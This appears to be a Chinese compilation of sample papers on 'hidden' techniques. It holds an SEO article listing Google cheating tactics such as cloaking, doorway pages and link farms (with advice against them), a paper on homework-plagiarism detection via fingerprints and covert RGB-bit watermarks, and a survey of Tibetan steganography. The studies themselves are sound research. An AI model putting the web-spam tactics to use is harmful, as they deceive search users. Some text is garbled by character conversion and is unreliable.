序論：好文章的創(chuàng)作是一個不斷探索和完善的過程，我們?yōu)槟扑]十篇隱藏技術(shù)論文范例，希望它們能助您一臂之力，提升您的閱讀品質(zhì)，帶來更深刻的閱讀感受。

篇（1）

第二定律人氣質(zhì)量定律

類似于科學(xué)引文索引的機制，說白了就是誰的論文被引用次數(shù)多，誰就被認(rèn)為是權(quán)威，論文就是好論文。這個思路移植到網(wǎng)上就是誰的網(wǎng)頁被鏈接次數(shù)多，那個網(wǎng)頁就被認(rèn)為是質(zhì)量高，人氣旺。在加上相應(yīng)的鏈接文字分析，就可以用在搜索結(jié)果的排序上了。這就引出了Google優(yōu)化的第二定律：人氣質(zhì)量定律。根據(jù)這一定律，Google搜索結(jié)果的相關(guān)性排序，并不完全依賴于詞頻統(tǒng)計，Google優(yōu)化更多地依賴于超鏈分析

第三定律自信心定律

人氣質(zhì)量定律解決的還是一個技術(shù)層面的問題，然而Google從誕生的那一天起，從來就不是一個純技術(shù)現(xiàn)像，它融合了技術(shù)，文化，市場等各個層面的因素。解決搜索引擎公司的生存和發(fā)展問題需要Google的第三定律–自信心定律。

Google優(yōu)化作弊手法：一：隱藏文本/隱藏鏈接

隱藏文本內(nèi)容隱藏鏈接

二：網(wǎng)頁與Google描述不符

一般發(fā)生于先向Google提交一個網(wǎng)站，等該網(wǎng)站被收錄后再以其它頁面替換該網(wǎng)站?！罢T餌行為”就屬于此類偷梁換柱之舉–創(chuàng)建一個優(yōu)化頁和一個普通頁，然后把優(yōu)化頁提交給Google，當(dāng)優(yōu)化頁被Google收錄后再以普通頁取而代之。

三：誤導(dǎo)性或重復(fù)性關(guān)鍵詞

誤導(dǎo)性關(guān)鍵詞重復(fù)性關(guān)鍵詞

四：隱形頁面

對實際訪問者或搜索引擎任一方隱藏真實網(wǎng)站內(nèi)容，以向搜索引擎提供非真實的搜索引擎友好的內(nèi)容提升排名。

五：欺騙性重定向

指把用戶訪問的第一個頁面(著陸頁)迅速重定向至一個內(nèi)容完全不同的頁面

六：門頁

是為某些關(guān)鍵字特別制作的頁面，專為Google設(shè)計，目的是提高特定關(guān)鍵詞在Google中的排名所設(shè)計的富含目標(biāo)關(guān)鍵詞的域名，且重定向至另一域名的真實網(wǎng)站。Google的Spiders往往忽略對那些自動重定向到其它頁的頁面的檢索。

七：復(fù)制的站點或網(wǎng)頁

最常見的當(dāng)屬鏡象站點。通過復(fù)制網(wǎng)站或卬頁的內(nèi)容并分配以不同域名和服務(wù)器，以此欺騙Google對同一站點或同一頁面進行多次索引。現(xiàn)在Google提供有能夠檢測鏡象站點的適當(dāng)?shù)倪^濾系統(tǒng)，一旦發(fā)覺鏡象站點，則源站點和鏡象站點都會被從索引數(shù)據(jù)庫中刪除

八：作弊鏈接技術(shù)/惡意鏈接

典型的作弊鏈接技術(shù)包括：

鏈接工廠

大宗鏈接交換程序

交叉鏈接

以上Google優(yōu)化作弊技術(shù)Google目前已經(jīng)可以監(jiān)控出來，我們建議各位在做Google優(yōu)化時不要使用上面列舉的作弊技術(shù)！

正確的Google優(yōu)化技術(shù)：1、標(biāo)題

在網(wǎng)頁的標(biāo)題(Title標(biāo)簽)加上關(guān)鍵詞，關(guān)鍵詞數(shù)不要過多，建議為1到3個。

2、KeyWords(關(guān)鍵詞)

KeyWords現(xiàn)在在Google優(yōu)化規(guī)則里面不是很受重視，但是，我們必要做到的是，盡一切能力進行優(yōu)化，所以，也是一定要做的。

3、Dscription(描述)

Dscription0盡可能的反復(fù)出現(xiàn)需要優(yōu)化的關(guān)鍵詞，但是語法一定要通順，流暢。符合瀏覽者搜索該關(guān)鍵詞的用意以及感受。也要符合網(wǎng)頁內(nèi)容的含義，最好能概括網(wǎng)頁的內(nèi)容，杜絕虛假。

4、網(wǎng)站框架結(jié)構(gòu)

盡量少使用圖片、FLASH、JS等文件，讓Google更好的抓去站點的信息，站內(nèi)鏈接要合理的設(shè)計。

篇（2）

中圖分類號：TP311 文獻(xiàn)標(biāo)識碼：A 文章編號：1009-3044(2012)36-8679-02

隨著計算機應(yīng)用的普及，高校正在逐步實現(xiàn)作業(yè)的電子化和網(wǎng)絡(luò)化。這種作業(yè)形式的改革有效減少了教育資源的浪費，減輕了教師的工作任務(wù)，提高了學(xué)生獲得作業(yè)批閱結(jié)果的效率，教與學(xué)得到了互動。應(yīng)該說作業(yè)的電子化是高校教學(xué)改革的一種必然趨勢，但隨之而來的是電子作業(yè)抄襲現(xiàn)象嚴(yán)重。學(xué)生抄襲作業(yè)時，少則部分復(fù)制他人文檔，調(diào)整文檔順序，內(nèi)容稍做修改;多則大部分甚至全盤拷貝他人文檔。學(xué)生對于電子作業(yè)的抄襲輕松快捷又不易被識別，這就成為作業(yè)改革受到嚴(yán)重困擾的主要因素。

在電子作業(yè)的反抄襲檢查工作上，教師的手工操作既耗時又費力，尤以高校學(xué)生人數(shù)眾多，涉及的教師面而變得局限性很大。那么，建立一種快速、準(zhǔn)確、高校的電子作業(yè)反抄襲檢查模型若能夠有效遏制了學(xué)生間電子作業(yè)相互拷貝，具有十分現(xiàn)實的意義。目的在于能夠極大地提高教學(xué)的質(zhì)量和效率，并有力的促進高校的教育改革。在應(yīng)用領(lǐng)域抄襲檢測算法已成為當(dāng)前研究的熱點話題，尤其是在學(xué)術(shù)論文的剽竊比對上。而我們能夠在平時的教學(xué)工作中有效地抵制電子作業(yè)的抄襲現(xiàn)象，既能真實反映教學(xué)效果又能提高學(xué)生自主學(xué)習(xí)的意識和能力。這不僅是對于教學(xué)工作的促進更是培養(yǎng)人教育人的有效途徑。

1 抄襲檢查技術(shù)

計算機技術(shù)的發(fā)展和網(wǎng)絡(luò)普遍應(yīng)用，在無意間方便了很多人進行文章抄襲。其實電子作業(yè)抄襲現(xiàn)象是國內(nèi)外的大學(xué)廣泛存在的現(xiàn)象，為了有力遏制學(xué)生的這種不誠信的行為,國外早在20世紀(jì)90年代就開始了相應(yīng)研究。由于西方語系的特點英語是以空格作為單詞間隔,因此英語的抄襲檢查方法是通過比較關(guān)鍵詞來判斷相似性的，效率很高。而中文與外文間存在著巨大的差異性, 強調(diào)詞法與句法,因此關(guān)鍵詞比對較不適用于中文。

目前中文的抄襲檢查方法主要有基于字符串的匹配、基于統(tǒng)計的中文分詞、文檔指紋、句子相似度等。

2 電子作業(yè)反抄襲檢查的實現(xiàn)

該文主要采用兩種方法以實現(xiàn)電子作業(yè)的反抄襲檢查：數(shù)字指紋技術(shù)和信息隱藏技術(shù)。首先吸取了文數(shù)字指紋技術(shù)的優(yōu)勢并對于指紋技術(shù)的算法（Hash函數(shù)）做出改進提出一種基于局部詞頻的指紋算法。其次很多高校特有應(yīng)用的實驗實習(xí)電子作業(yè)，此時內(nèi)容都較為相似，所以該文又增加了基于信息隱藏技術(shù)的作業(yè)反抄襲檢查方法，以對于這類電子作業(yè)進行有效的比對。

2.1基于局部詞頻的指紋技術(shù)

文檔數(shù)字指紋技術(shù)是依據(jù)生成的待比較的文檔指紋，通過在樣本庫中做對比進行抄襲檢測。當(dāng)相匹配指紋數(shù)目超過一定值時，可認(rèn)定存在抄襲行為。為使其具有推廣力，一般會引入松弛因子以提高檢測的準(zhǔn)確性。指紋生成算法是文檔數(shù)字指紋技術(shù)的關(guān)鍵，一般利用 Hash 函數(shù)對文檔中的特征標(biāo)記進行計算，獲得整數(shù)值。一般需要計算函數(shù)。

在高校的電子作業(yè)中很多都僅是對作業(yè)的句子的長度或詞語的先后次序作了調(diào)整，內(nèi)容的變化是較小的，用這種方法就會過度精確，用于檢查電子作業(yè)效率很低。所以該文對這種算法做出一定改進，提出一種基于詞頻統(tǒng)計的指紋技術(shù)。局部詞頻統(tǒng)計技術(shù)借助于向量空間模型來實現(xiàn)。這種向量空間模型是由句子為單位構(gòu)成的，并對句子進行關(guān)鍵詞提取，并對關(guān)鍵詞重新排序構(gòu)建，根據(jù)編碼與詞頻共同獲取句子的指紋。依據(jù)句子的指紋獲取文本相似度，具體的算法描述

2.2信息隱藏技術(shù)

在高校學(xué)生作業(yè)有一些是比較特殊的，例如在機房中完成的實驗實習(xí)類報告，這類作業(yè)的特點是內(nèi)容大致是相同的。可以在作業(yè)的源頭采用一些基于信息隱藏的嵌入水印算法。在對作業(yè)進行片段拷貝時就在源頭嵌入水印，能有效的防止拷貝抄襲的現(xiàn)象發(fā)生。這樣即使電子作業(yè)的內(nèi)容完全相同也能有效的檢查到。不能輕易被破壞。這類作業(yè)防抄襲檢查的水印嵌入既要求字符格式改變不易被擦覺也要兼顧有較大的信息嵌入量，不需太多的字符就能嵌入進機房的機器號及上機完成作業(yè)的時間。

由于人眼的視細(xì)胞對顏色敏感度的理論指出人眼對綠色最敏感，其次是紅色，而對于藍(lán)色是最不敏感的。而計算機的顏色設(shè)置理論是數(shù)字化的，所以可以對于RGB()的值中低位的值做秘密信息嵌入?？梢詫值和G值改變都改變最低的1位bit，而對B值最低的2位bit。這樣就對每個電子文檔的字符嵌入了4位bit的信息隱藏，并把這4位二進制作為嵌入信息隱藏1Byte的高4位。同時也可以利用字符下劃線的B值最低2位bit，G值的最低1位bit，和R值的最低1位bit來隱藏4位信息。這4位bit作為嵌入信息隱藏1Byte的低4位。

在實際操作中程序所嵌入的信息包括程序讀取的機器號及上機時間與機房管理系統(tǒng)數(shù)據(jù)庫配合能準(zhǔn)確定位學(xué)生的學(xué)號、姓名、班級等。當(dāng)學(xué)生完成自己的電子作業(yè)過程中點擊保存、Word程序自動保存、關(guān)閉Word文檔時都會觸發(fā)這一嵌入秘密信息的相關(guān)程序的運行，可以在全文實現(xiàn)循環(huán)嵌入秘密信息的作用。該反抄襲程序是在打開作業(yè)文檔時自動運行，能自主識別學(xué)生作業(yè)中具有抄襲嫌疑的片段，協(xié)助教師對學(xué)生的作業(yè)給出客觀評價，有效的對這類作業(yè)的抄襲起到屏蔽的作用。

3 結(jié)束語

在以往的反抄襲檢查中主要是通過文檔間內(nèi)容重疊程度或者相似程度來斷定的，相關(guān)的檢查技術(shù)也很多也較成熟。但往往面對的是海量數(shù)據(jù)或是長文檔，并需要對文檔字符做精確檢查。而在教學(xué)過程中的電子作業(yè)無論在內(nèi)容、篇幅和數(shù)量方面都有很大差別。

該文的創(chuàng)新點是結(jié)合了基于局部詞頻的指紋技術(shù)和嵌入水印的信息隱藏技術(shù)，提出了一處主要針對高校的作業(yè)特點的反抄襲檢查的模型。較為全面的考慮到了這類作業(yè)不同于學(xué)術(shù)剽竊的相關(guān)問題，所建立的這種快速、準(zhǔn)確、高效的電子作業(yè)反抄襲檢查模型能夠在一定程度上遏制學(xué)生間電子作業(yè)相互拷貝，具有十分現(xiàn)實的意義。

參考文獻(xiàn):

[1] 蔣波.一種基于三重DES和RSA的綜合加密方案[J].微計算機信息,2007(18).

[2] 陳國良.并行算法實踐[M].北京:高等教育出版社,2004.

[3] 秦玉平,冷強奎,王秀坤,等. 基于局部詞頻指紋的論文抄襲檢測算法[J].計算機工程,2011(6).

篇（3）

中圖分類號：TN401 文獻(xiàn)標(biāo)識碼：A 文章編號：2095-1302（2014）12-00-05

0 引 言

安全、有效的信息傳輸對國家安全、社會穩(wěn)定和人民安居樂業(yè)至關(guān)重要。網(wǎng)絡(luò)和多媒體技術(shù)的發(fā)展，使得信息傳輸?shù)乃俣群蛿?shù)量正以驚人的增量發(fā)展。然而，信息傳輸?shù)谋憷诜奖闳藗兊耐瑫r也給信息安全帶來了隱患，同時也為基于數(shù)字載體的秘密信息傳輸提供了廣闊的研究空間。目前，基于載體的秘密信息傳輸是信息安全領(lǐng)域的一個方興未艾的研究熱點。而基于載體預(yù)處理的藏文信息隱藏技術(shù)將為信息安全領(lǐng)域提供一些新的數(shù)字信息共享和傳輸理念，特別是藏文的預(yù)處理規(guī)律、在數(shù)字信息中的隱藏規(guī)律等，將有助于涉藏秘密通信技術(shù)的發(fā)展，并可以對民用和商用領(lǐng)域中涉及到藏文內(nèi)容的傳輸、共享、存儲和提取的通信過程起到安全保護、版權(quán)保護及完整性認(rèn)證的作用，并對國家涉藏領(lǐng)域的網(wǎng)絡(luò)輿情監(jiān)控、國內(nèi)外涉藏敏感信息標(biāo)注和情感色彩認(rèn)知起著至關(guān)重要的作用。

在藏文信息隱藏技術(shù)方面，目前主要涉及的技術(shù)有關(guān)鍵字識別、字符識別和提取、韻律認(rèn)知、語義角色標(biāo)注、文本資源挖掘和語料抽取等，并以此為基礎(chǔ)進行置亂優(yōu)化。

1 國內(nèi)外信息隱藏技術(shù)研究現(xiàn)狀

信息隱藏一直是信息安全領(lǐng)域中保障隱秘信息安全傳輸和數(shù)字信息版權(quán)的重要手段，也是近年來國內(nèi)外學(xué)者研究的熱點之一。最新的一屆ACM信息隱藏和多媒體安全會議（ACM IH&MMSec’13 Workshop）的主要研究內(nèi)容有信息隱藏算法、多媒體水印和認(rèn)證、載體運算域的數(shù)字信號處理等。其中，信息隱藏算法的設(shè)計首先依賴于載體的選擇和預(yù)處理;關(guān)于多媒體水印和認(rèn)證的研究則將信息隱藏和數(shù)字水印的載體范圍從數(shù)字圖像等常見載體拓展到了包括三維模型在內(nèi)的新型載體上;載體運算域的數(shù)字信號處理涉及到了載體預(yù)處理時所用的具體方法，如空間域或變換域等。2013年IEEE 圖像處理國際會議（IEEE ICIP 2013）的主要研究內(nèi)容包括圖像、音視頻和3-D等多媒體的信息隱藏算法和多媒體特征提取和分析等，這兩類研究內(nèi)容均與載體的選取和預(yù)處理有關(guān)。最新一屆信息隱藏國際會議（IH2012）的主要研究內(nèi)容包括多媒體安全和其他載體的信息隱藏。我國的第十一屆全國信息隱藏暨多媒體安全學(xué)術(shù)大會（CIHW2013）中關(guān)于信息隱藏算法的研究內(nèi)容也主要集中在非常規(guī)載體的分析和預(yù)處理上。

藏文作為信息隱藏領(lǐng)域一種新的信息格式，對其研究主要局限于藏文操作系統(tǒng)、藏文信息技術(shù)標(biāo)準(zhǔn)、藏文信息處理等幾個方面[1]，具體內(nèi)容集中在藏文編碼字符集、術(shù)語集、拼音輔助集等的建立。

基于載體的秘密通信技術(shù)是20世紀(jì)90年代中期發(fā)展起來的跨領(lǐng)域的學(xué)科，而載體的預(yù)處理技術(shù)一直是其研究的主要方向。對隱藏載體進行預(yù)處理，生成信息隱藏嵌入?yún)^(qū)域是信息隱藏算法中最重要的研究內(nèi)容之一。從上述國內(nèi)外各學(xué)術(shù)會議中關(guān)于信息隱藏的參會論文和研討情況看，各類載體固有特性的研究對預(yù)處理技術(shù)有著重要的意義，且數(shù)字圖像依然是主要的一類載體，而三維模型將是未來主要研究的一類非常規(guī)載體。下面就對數(shù)字圖像和三維模型兩類載體的預(yù)處理技術(shù)的研究現(xiàn)狀進行闡述。

1.1 數(shù)字圖像預(yù)處理技術(shù)研究綜述

基于數(shù)字圖像的信息隱藏技術(shù)是信息隱藏學(xué)科中重要的技術(shù)分支，是目前應(yīng)用最廣、覆蓋范圍最大的信息隱藏技術(shù)手段。在基于數(shù)字圖像的信息隱藏技術(shù)研究中，信息隱藏區(qū)域的生成是關(guān)系算法性能的重要因素。信息隱藏區(qū)域的生成方法主要包括空間域生成法、變換域生成法以及空間域和變換域聯(lián)合的生成方法。

空間域算法：作為空間域算法中出現(xiàn)最早、操作最簡單且應(yīng)用最廣泛的算法，基于位平面分解理論的LSB算法可以直接替換的方式隱藏較大的數(shù)據(jù)量，劉紅翼等提出的一種LSB算法具有容量大、運算量小的特點[2];劉文彬等提出的LSB隱寫替換的消息定位方法則可以對此類算法進行檢測[3];而IH2012的論文中，有學(xué)者運用假設(shè)檢驗理論和含秘載體的奇偶感知特性可有效地檢測LSB算法所隱藏的隱秘信息[4，5]，這些研究為藏文信息隱藏中涉及到關(guān)于此類算法的抗檢測性研究提供了新的待改進方向。張焱等提出的像素值排序和趙彥濤等提出的直方圖修改等空間域算法在沿用LSB直接替換的隱藏理念的同時，還提升了魯棒性，因此也被廣泛用于數(shù)字圖像載體預(yù)處理[6，7];隨后，楊春芳等提出了針對此類算法的檢測方法[8]，這也為針對此類算法抗檢測性改進的研究提供了重要依據(jù)。此外，上述同類算法中的載體子區(qū)域劃分思想、內(nèi)容自適應(yīng)思想等也對本項目基于載體結(jié)構(gòu)特性建立空間匹配模型的機制提供了方法學(xué)上的有力支持[9-13]。

變換域算法：不同于空間域算法直接對載體的空間特性進行修改，變換域預(yù)處理方法以修改載體的頻率參數(shù)來隱藏信息[14]，因此算法的魯棒性比空間域算法好。在此基礎(chǔ)上，唐燕等又對隱秘信息的檢測和恢復(fù)進行了研究和改進，實現(xiàn)了幾乎無需原始參量的半盲提取[15]。盡管變換域算法不具備空間域算法容量大、運算量小和易操作等優(yōu)勢，但是變換域中的多小波理論因其同時具有對稱性、短支撐性、二階消失矩和正交性等特性成為了信號處理中有明顯優(yōu)勢且較常用的方法，在前期研究中利用多小波方法將數(shù)字圖像載體分塊后作為嵌入?yún)^(qū)域，提高了算法的魯棒性和不可見性[16，17]，這種方法為在藏文信息隱藏研究中建立基于區(qū)域能量的階梯性分布機制提供了一種研究手段。

混合域算法：較單獨運用一種空間域或變換域生成隱藏區(qū)域并設(shè)計信息隱藏算法來看，基于空間域與變換域聯(lián)合的信息隱藏算法可以兼有多種算法的性能優(yōu)勢。在基于空間域和變換域聯(lián)合的信息隱藏算法中，空間域的作用體現(xiàn)在數(shù)據(jù)嵌入的具體操作方面，因為隱藏的實質(zhì)就是在當(dāng)前環(huán)境下的空間分量上進行數(shù)據(jù)修改，利用邊緣像素值差分（Edged Pixel Value Differencing，EPVD）將載體換算為若干個像素塊，以最大斜角的數(shù)據(jù)修改作為信息隱藏的具體方法[18];利用濕紙碼和基于LSBM的雙層隱寫來對載體進行加1嵌入或減1嵌入[19];另外，國內(nèi)外許多學(xué)者利用調(diào)色板理論進行數(shù)據(jù)嵌入[20，21]。而變換域在載體預(yù)處理中的主要作用是生成滿足特定需要的信息隱藏環(huán)境（區(qū)域），主要包括變換后的系數(shù)分布以及n階分量子圖等。如對RSV顏色空間的V分量做DCT變換，分塊后作為嵌入?yún)^(qū)域[22];利用視覺顯著點技術(shù)確定跟蹤窗（Regions of Interest，ROI），在ROI的DCT系數(shù)上嵌入隱藏信息，并指定某個ROI邊緣地圖脆弱性標(biāo)識，嵌入到DWT變換后的含密圖像中[23];前期研究中，研究人員利用自適應(yīng)顏色遷移理論中l(wèi)αβ域?qū)︻伾目刂屏?，消除了RGB顏色分量的強相關(guān)性，并結(jié)合GHM能量分區(qū)隱藏信息，在不可見性、嵌入信息量和魯棒性方面均具有較好的表現(xiàn)[24]。

1.2 三維模型預(yù)處理技術(shù)研究綜述

潘志庚等將基于三維模型的信息隱藏預(yù)處理方法主要分為空間域算法和變換域算法[25]。這也這為藏文信息隱藏研究提供了新的思路和方法。

空間域算法：空間域算法通常具有易嵌入和盲提取的特點，如直接置換載體的幾何信息來隱藏數(shù)據(jù)是三維模型載體信息隱藏最原始、最直接的方法[26]。為改進此類算法的魯棒性，引入仿射不變量是有效的措施，如利用具有連續(xù)解析性的仿射不變量優(yōu)化需要置換的頂點[27]、 將穩(wěn)態(tài)錨點通過三角垂心編碼解析為聚類元素從而嵌入隱秘信息[28]。此外，基于主元分析的算法也有助于改善空間域算法的魯棒性，例如可根據(jù)主元分析（Primary Component Analysis，PCA）來確定模型的關(guān)鍵位置作為魯棒區(qū)域，并用網(wǎng)格分割法改進魯棒性和不可見性[29-32]。這類算法也為藏文信息隱藏從載體結(jié)構(gòu)特性進行解析和預(yù)處理提供了理論依據(jù)。改進型的空間域算法多針對魯棒性或容量性有所提升，如基于連續(xù)解析性的體積矩的盲算法，改善了之前算法對連通性攻擊的魯棒性[33];通過重排頂點和面片在網(wǎng)格文件中的表示信息，利用表示域內(nèi)的信息進行嵌入使算法具有良好的不可見性和大容量性[34]，但對相似變換以外的攻擊不具有魯棒性。

變換域算法：三維模型預(yù)處理的變換域方法大多利用頻譜分析將模型信息參數(shù)化[35]，對參數(shù)進行少量修改后以隱藏信息，其中，基于小波變換的算法可以對規(guī)則和非規(guī)則網(wǎng)格模型進行小波域參量修改以嵌入較多信息[36]。理論上，變換域算法比空間域算法魯棒性強，但由于三維模型頂點的天然無序性和不規(guī)則性，對其進行頻譜分析難度大，導(dǎo)致變換域算法實用性目前較低，因此空間域算法依然是比變換域算法更有實用價值的研究方向[37]。

2 藏文信息隱藏技術(shù)研究現(xiàn)狀

目前反映藏文信息處理技術(shù)最新進展的文獻(xiàn)較少，綜合以已有的研究成果及相關(guān)研究文獻(xiàn)，藏文信息處理可劃分為藏語信息處理和藏字信息處理兩個層次[38，39]。藏語信息處理包括機器翻譯、信息檢索、信息提取、文本校對、文本生成、文本分類、自動摘要以及藏文字識別和語音識別的后處理等等;而藏字信息處理包括操作系統(tǒng)以及編碼字符集、輸入技術(shù)、字形描述與生成、存儲、編輯、排版、字頻統(tǒng)計和藏字屬性庫等。這些研究基礎(chǔ)對藏文信息隱藏技術(shù)的發(fā)展至關(guān)重要，是基于載體預(yù)處理的藏文信息隱藏的主要技術(shù)來源。鑒于藏文的獨特構(gòu)造，以及藏文的特點，目前對藏文秘密信息的預(yù)處理技術(shù)一般指置亂和加密算法的選擇[40]，而置亂使信息變得雜亂無章難以辨認(rèn)，可以起到加密與改變信息嵌入特性的作用?？捎糜诓匚男畔㈦[藏的置亂算法主要有Arnold變換、幻方矩陣、Gray碼變換、混沌序列等方法[41]。其中，Arnold變換算法簡單且置亂效果顯著，使有意義的數(shù)字圖像變成像白噪聲一樣的無意義圖像，實現(xiàn)了信息的初步加密和信息結(jié)構(gòu)的調(diào)整，在嵌入信息為數(shù)字圖像時可以很好的應(yīng)用[42]?；梅街脕y的思想基于查表思想，基于數(shù)字圖像的幻方置亂可降低幻方置亂階數(shù)或以圖像塊進行置亂，實現(xiàn)置亂效果與系統(tǒng)開銷的平衡[43]。Gray是一種具有反射特性和循環(huán)特性的單步自補碼，它的循環(huán)、單步特性消除了隨機取數(shù)時出現(xiàn)重大誤差的可能，它的反射、自補特性使得求反非常方便[44]。混沌的優(yōu)勢在于對初始條件的極端敏感和軌跡在整個空間上的遍歷性。根據(jù)經(jīng)典的Shannon置亂與擴散的要求，這些獨特的特征使得混沌映射成為信息隱藏嵌入算法的優(yōu)秀候選[45]。上述傳統(tǒng)的置亂算法一般用于正方形圖像處理，而經(jīng)過改進的Arnold算法可直接用于寬高不等的矩形圖像而不必進行正方形擴展[46]，這也將是藏文信息隱藏技術(shù)所采用的主要置亂方法之一。

3 藏文信息隱藏技術(shù)的研究目標(biāo)、研究內(nèi)容和要解決的問題

3.1 研究目標(biāo)

面向藏文安全通信的高性能信息隱藏算法是目前藏文信息隱藏技術(shù)的主要目標(biāo)，包括提出性能出色的、適合藏文通信要求的信息隱藏算法;提出一種具有普適性的高性能信息隱藏嵌入?yún)^(qū)域生成原則和嵌入規(guī)則：

（1） 基于數(shù)字圖像的藏文信息隱藏算法：提出至少兩種基于數(shù)字圖像的藏文信息隱藏算法，算法將同時滿足面向藏文安全的信息隱藏應(yīng)用所要求的高不可見性（PSNR≥34.90dB）、強魯棒性（抗擊大約69%以下的JPEG2000壓縮、35%以下的剪切及常見濾波與加噪）、大容量性（基于彩色圖像的信息隱藏信息嵌入率≥18%）以及高感知篡改性（檢測隱藏數(shù)據(jù)是否被篡改能力≥95%）。

（2） 基于三維模型的藏文信息隱藏算法：提出至少一種基于三維模型的藏文信息隱藏算法。算法將同時滿足面向藏文安全的信息隱藏應(yīng)用所要求的高不可見性（RSNR≥69.94dB、En≥70%）、應(yīng)對一般攻擊的強魯棒性（抗擊大約0.10%隨機加噪、50-times Laplacian平滑、50%均勻重網(wǎng)格化以及均勻簡化等）、大容量性（相對理想的RSNR，嵌入率≥29%）以及低復(fù)雜度（根據(jù)載體模型幾何信息量而變化）。

（3） 普適性信息隱藏嵌入?yún)^(qū)域生成原則和嵌入規(guī)則：利用載體圖像能量和復(fù)雜度特性，提出基于能量性和復(fù)雜度的藏文信息隱藏區(qū)域生成原則和嵌入規(guī)則，將適應(yīng)于所有對數(shù)字圖像處理后有能量區(qū)別的圖像處理方法，指導(dǎo)設(shè)計者利用能量與魯棒性、復(fù)雜度與不可見性的對應(yīng)關(guān)系，研究出同時滿足不可見性和魯棒性的信息隱藏算法。

3.2 研究內(nèi)容

（1） 藏文信息隱藏區(qū)域生成原則與規(guī)則研究：數(shù)字圖像信息隱藏技術(shù)的研究核心集中在隱藏區(qū)域和嵌入規(guī)則的設(shè)計上，藏文信息隱藏算法的設(shè)計方法和思路就是在選定藏文信息隱藏區(qū)域以及制定好信息隱藏規(guī)則后，按照一定的順序?qū)烧哌M行合理的組織，所以研究藏文信息隱藏區(qū)域生成原則以及信息隱藏規(guī)則是重點。

（2） 基于數(shù)字圖像的藏文信息隱藏算法研究：隱藏算法是基于數(shù)字圖像的信息隱藏技術(shù)的研究核心，需按照嵌入域進行劃分，對基于空間域和基于變換域的信息隱藏算法分別進行研究，提出單獨基于空間域、單獨基于變換域以及兩者聯(lián)合應(yīng)用的數(shù)字圖像信息隱藏算法。

（3） 基于三維模型的藏文信息隱藏算法研究：首先對三維模型的結(jié)構(gòu)特性和能量特性進行研究，再根據(jù)載體模型的特性找出對應(yīng)的預(yù)處理方法。在研究基于空間域和基于變換域的信息隱藏算法的基礎(chǔ)上，提出改進型的三維模型信息隱藏算法。主要用于提升載體有效嵌入容量和降低載體視覺失真度。

（4） 載體與藏文秘密信息的一致化方法研究：基于上述研究基礎(chǔ)，生成結(jié)構(gòu)和能量差異化子區(qū)域，再將藏文秘密信息按照拼音屬性進行解析生成信息序列。再利用優(yōu)化算法使得預(yù)處理后的載體信息和藏文秘密信息的解析編碼獲得最大一致化，從而提高算法性能。

3.3 需解決的關(guān)鍵問題

綜合已有的研究，在藏文信息隱藏技術(shù)方面，目前需要解決的問題有以下幾個方面：

（1） 信息隱藏區(qū)域與嵌入規(guī)則設(shè)計：在具有什么性質(zhì)的區(qū)域內(nèi)應(yīng)用什么樣的規(guī)則進行藏文信息隱藏才可以解決“不可見性與魯棒性的對立、容量性與抗分析性的對立”問題，是藏文信息隱藏研究領(lǐng)域的關(guān)鍵技術(shù)之一。需找出隱藏區(qū)域的性質(zhì)與信息隱藏性能的關(guān)系，提出面向藏文信息傳輸?shù)男畔㈦[藏區(qū)域選擇的原則與方法;給出在具有具體性質(zhì)的嵌入?yún)^(qū)域中的藏文信息隱藏嵌入規(guī)則的制定原理和方法;提出大量的藏文信息數(shù)據(jù)轉(zhuǎn)換思想與方法，以提供形式多樣的信息隱藏嵌入規(guī)則。

（2） 數(shù)字圖像載體預(yù)處理方法：①多小波理論在載體預(yù)處理中的應(yīng)用。對于數(shù)字圖像經(jīng)過多小波變換后所具有的特殊性質(zhì)，找出多小波變換后數(shù)字圖像所具有的能量特性與基于數(shù)字圖像信息隱藏算法性能之間所遵循的規(guī)律已有學(xué)者進行研究。②顏色空間的性能分析與應(yīng)用選取。RGB、CMYK、lαβ、YUV以及HSx顏色空間，應(yīng)用方法以及應(yīng)用各有優(yōu)劣勢。該技術(shù)的應(yīng)用難點在于為顏色空間在藏文信息隱藏的應(yīng)用提出完備的應(yīng)用方案，因為這些顏色空間在藏文信息隱藏技術(shù)中的應(yīng)用目前非常少，應(yīng)用優(yōu)劣還處于實驗驗證階段，沒有理論驗證的支持。

（3） 三維網(wǎng)格模型載體預(yù)處理方法：骨架抽取和內(nèi)切球解析技術(shù)在藏文信息隱藏算法中的應(yīng)用。這種方法不涉及頂點數(shù)量及坐標(biāo)的改變和拓?fù)潢P(guān)系的修改。難點在于尋找一個理想的仿射不變量作為輔助參數(shù)以彌補算法對縮放攻擊的脆弱性。

（4） 藏文的置亂與遺傳優(yōu)化算法：有的藏文字處理系統(tǒng)把藏文看成是由30個輔音、4個元音、3個上加字、5個下加字共42個藏文字符組成的，而有的則認(rèn)為由其他數(shù)量的字符組成?；趯Σ匚闹屑幼謱Πl(fā)音的影響規(guī)律的研究，利用字符與二進制碼的解析規(guī)則和置亂與優(yōu)化技術(shù)對信息置亂，達(dá)到隱藏信息與載體信息的最大匹配度也是一個技術(shù)難點。

4 藏文信息隱藏技術(shù)研究的新方法

（1）利用載體圖像能量和復(fù)雜度特性，提出基于能量性和復(fù)雜度的藏文信息隱藏區(qū)域生成原則和嵌入規(guī)則。高能量與強魯棒、高復(fù)雜度與高不可見性的對應(yīng)關(guān)系，從根本上解決藏文信息隱藏算法中不可見性和魯棒性的對立問題，為面向藏文通信安全的信息隱藏算法的設(shè)計給出一種普適性方法。

（2）根據(jù)數(shù)字圖像信息隱藏嵌入?yún)^(qū)域的生成原則和嵌入規(guī)則，提出新的、高性能的數(shù)字圖像的藏文信息隱藏算法。算法利用lαβ等顏色空間轉(zhuǎn)換以及多小波對載體圖像進行的處理，生成具有不同能量特性的嵌入?yún)^(qū)域，從頻率域上滿足藏文信息隱藏的應(yīng)用要求;通過對載體圖像進行顏色遷移、矢量解析以及環(huán)形處理，從數(shù)字圖像的空間結(jié)構(gòu)上滿足藏文信息隱藏的應(yīng)用要求。

（3）提出滿足三維模型結(jié)構(gòu)特性和能量特性的藏文信息隱藏算法。算法利用局部高度理論和均值偏移理論對載體模型進行預(yù)處理，生成具有不同能量特性的嵌入?yún)^(qū)域，從頻域上滿足信息隱藏的應(yīng)用要求;通過對載體圖像進行骨架抽取、內(nèi)切球解析，從空間結(jié)構(gòu)上滿足藏文信息隱藏的應(yīng)用要求。

參考文獻(xiàn)

[1]陳玉忠，俞士汶. 藏文信息處理技術(shù)的研究現(xiàn)狀與展望[J]. 中國藏學(xué). 2003（4）：97-107.

[2]劉紅翼，王繼軍，韋月瓊，等.一種基于LSB的數(shù)字圖像信息隱藏算法[J].計算機科學(xué)，2008， 35（1）：100-102.

